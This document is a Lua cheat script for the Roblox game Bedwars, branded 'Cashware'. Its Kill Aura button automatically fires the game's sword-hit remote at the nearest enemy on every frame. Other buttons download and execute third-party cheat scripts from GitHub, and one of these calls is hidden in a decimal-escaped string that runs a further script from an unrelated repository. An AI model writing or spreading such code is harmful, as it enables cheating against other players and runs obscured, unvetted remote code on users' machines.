local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/Consistt/Ui/main/UnLeaked"))()


library.rank = "scripter"
local Wm = library:Watermark("cashware | v" .. library.version ..  " | " .. library:GetUsername() .. " | rank: " .. library.rank)
local FpsWm = Wm:AddWatermark("fps: " .. library.fps)
coroutine.wrap(function()
    while wait(.75) do
        FpsWm:Text("fps: " .. library.fps)
    end
end)()



library.title = "Cashware.xyz"

local Init = library:Init()

local Tab1 = Init:NewTab("Bedwars")

local Label1 = Tab1:NewLabel(" Bedwars ", "center")

local Button1 = Tab1:NewButton("Kill Aura", function()
    local function getClosest()
   local closest = math.huge
   local choice = game.Players.LocalPlayer
   
   for i,v in next, game.Players:GetChildren() do
       if v.Character and v.Character:FindFirstChild("HumanoidRootPart") and v.Name ~= game.Players.LocalPlayer.Name and v.Team ~= game.Players.LocalPlayer.Team then
           local dist = (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - v.Character.HumanoidRootPart.Position).Magnitude
           
           if dist <= closest then
               closest = dist
               choice = v
           end
       end
   end
   
   return choice
end

game:GetService("RunService").RenderStepped:Connect(function()
       pcall(function()
       local closest = getClosest().Character
       
       if closest ~= nil then
           game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.SwordHit:InvokeServer({["entityInstance"] = closest,["weapon"] = game.Players.LocalPlayer.Character.HandInvItem.Value})
       end
   end)
end)
end)

local Button1 = Tab1:NewButton("Vape V4", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/NewMainScript.lua", true))()
end)

local Button1 = Tab1:NewButton("Vape V4 Private", function()
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\55\71\114\97\110\100\68\97\100\80\71\78\47\86\97\112\101\86\52\70\111\114\82\111\98\108\111\120\47\109\97\105\110\47\78\101\119\77\97\105\110\83\99\114\105\112\116\46\108\117\97\34\44\32\116\114\117\101\41\41\40\41\10\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\83\119\111\112\116\116\47\83\99\114\105\112\116\115\47\109\97\105\110\47\83\77\75\69\66\68\87\65\82\83\34\44\32\116\114\117\101\41\41\40\41\10")()
end)
